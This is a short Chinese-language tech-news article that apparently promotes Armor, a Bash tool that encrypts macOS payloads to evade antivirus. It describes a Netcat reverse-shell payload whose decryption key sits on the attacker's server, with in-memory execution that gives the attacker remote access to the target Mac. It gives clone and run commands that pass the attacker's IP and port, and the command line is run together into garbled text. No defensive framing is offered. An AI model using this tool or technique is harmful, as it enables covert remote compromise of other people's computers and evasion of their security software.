Armor：一款功能強大的macOS Payload加密工具

前言

今天給大家介紹的是一款名叫Armor的macOS Payload加密工具，Armor是一個功能強大的Bash腳本，通過它來創建的加密macOS Payload能夠繞過反病毒掃描工具。

Armor介紹

Armor可以直接配合NetcatPayload一起使用，Netcat監聽器的目標埠為4444，讀取了「payload.txt」文件之後，我們會看到文件內容包含了Bash代碼，執行之後，將會在目標macOS系統和攻擊者的Netcat監聽器之間建立一條TCP連接。Armor可以用來對Bash腳本的代碼進行加密，Ncat可以用來在攻擊者的伺服器端託管解密密鑰。當Stager在目標macOS系統上執行之後，bash代碼會被解密並執行，整個過程不會在磁碟中存儲任何數據。接下來，當解密密鑰被使用之後，Ncat會終止監聽器的運行。當Netcat鏈接建立成功之後，攻擊者就可以獲取到目標macOS系統的遠程訪問權了。

當然了，很多同學會認為對macOS Payload進行加密純屬多餘，因為這種特殊的Bash腳本本來就能夠繞過反病毒引擎。。但是我們這裡只是舉個例子，因為同等程度地代碼混淆和加密還可以應用到很多複雜的Python、Ruby和Shell腳本身上。

工具安裝

Armor使用了LibreSSL來加密輸入的文件，並創建SSL證書。如果你的設備上沒有安裝LibreSSL的話，Armor會自動幫你安裝它。這個功能的相關代碼可以在armor.sh文件中找到。除了LibreSSL之外，依賴組件還包括Ncat在內，在Kali上大家可以使用下列命令完成安裝：

$apt-get update && apt-get install nmap

Armor工具的代碼克隆以及執行命令如下：

git clone https://github.com/tokyoneon/Armorcd Armor/chmod +x armor.sh./armor.sh /path/to/payload.txt 1.2.3.4 443

其中，1.2.3.4是攻擊者的IP地址，解密密鑰就託管在這個伺服器上，它可以是一個本地IP或者VPS伺服器，443為伺服器埠號，大家可以根據自己的需要來自行定義。

項目地址

Armor：【GitHub傳送門】

參考來源：

Armor

，FB小編Alpha_h4ck編譯，轉載請註明來自FreeBuf.COM

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！